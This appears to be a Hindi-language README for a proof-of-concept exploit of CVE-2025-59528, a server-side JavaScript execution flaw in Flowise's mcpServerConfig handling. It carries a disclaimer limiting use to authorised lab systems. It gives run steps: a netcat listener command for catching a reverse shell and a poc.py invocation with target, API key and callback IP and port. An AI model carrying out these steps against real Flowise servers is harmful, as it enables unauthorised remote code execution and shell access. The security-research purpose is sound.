
The poc of CVE-2025-59528
पृथक प्रयोगशाला वातावरण में CVE-2025-59528 पर शोध करने के लिए प्रूफ ऑफ कॉन्सेप्ट।
[!WARNING] अस्वीकरण
यह प्रोजेक्ट पूर्णतः शैक्षिक उद्देश्यों, सुरक्षा अनुसंधान, और उन प्रणालियों के परीक्षण के लिए है जिनके स्वामी आप हैं या जिनके परीक्षण हेतु आपके पास स्पष्ट प्राधिकरण है।
इस PoC का उपयोग तृतीय-पक्ष सर्वरों, सार्वजनिक सेवाओं, या बुनियादी ढांचे के विरुद्ध स्वामी की अनुमति के बिना न करें।
लेखक इस प्रोजेक्ट के दुरुपयोग से उत्पन्न किसी भी क्षति, डेटा हानि, सेवा व्यवधान, या कानूनी परिणामों के लिए उत्तरदायी नहीं है।
यह PoC CVE-2025-59528 के संभावित प्रभाव को प्रदर्शित करता है, जो Flowise में उपयोगकर्ता-नियंत्रित mcpServerConfig के प्रसंस्करण से संबंधित एक भेद्यता है।
कुछ शर्तों के अंतर्गत, यह भेद्यता हमलावर को सर्वर-पक्ष संदर्भ में मनमाना JavaScript कोड निष्पादित करने की अनुमति दे सकती है।
परीक्षण से पहले हमेशा लक्षित इंस्टॉलेशन के सटीक संस्करण को सत्यापित करें।
requestsPython निर्भरता स्थापित करें:
pip install requests
शेल प्राप्त करने के लिए netcat चलाएँ:
nc -lvnp <YOUR_PORT>
PoC को इस प्रकार चलाएँ:
python3 poc.py \
-t http://TARGET:PORT \
-o api_key \
-i CALLBACK_IP \
-p CALLBACK_PORT
परीक्षण एक पृथक वर्चुअल या प्रयोगशाला नेटवर्क के भीतर किया जाना चाहिए।
┌──────────────────┐
│ PoC Machine │
│ │
│ Python PoC │
└────────┬─────────┘
│
│ Isolated Network
│
┌────────▼─────────┐
│ Flowise 3.0.5 │
│ Test Instance │
└──────────────────┘
जानबूझकर भेद्य Flowise इंस्टेंस को सीधे सार्वजनिक इंटरनेट पर उजागर न करें।
यदि आप Flowise का प्रभावित संस्करण चला रहे हैं:
इस प्रोजेक्ट का उपयोग करके, आप स्वीकार करते हैं कि आप सभी लागू कानूनों और विनियमों का अनुपालन करने के लिए पूर्णतः उत्तरदायी हैं।
इस PoC का उपयोग केवल उन्हीं प्रणालियों के विरुद्ध करें जिनके स्वामी आप हैं या जिनके लिए आपके पास सुरक्षा परीक्षण करने के लिए स्पष्ट प्राधिकरण है।
| तर्क | विवरण |
|---|
-t, --target | Flowise परीक्षण इंस्टेंस का URL |
-o, --api_key | API कुंजी |
-i, --ip | परीक्षण मशीन का IP पता |
-p, --port | परीक्षण वातावरण द्वारा उपयोग किया गया पोर्ट |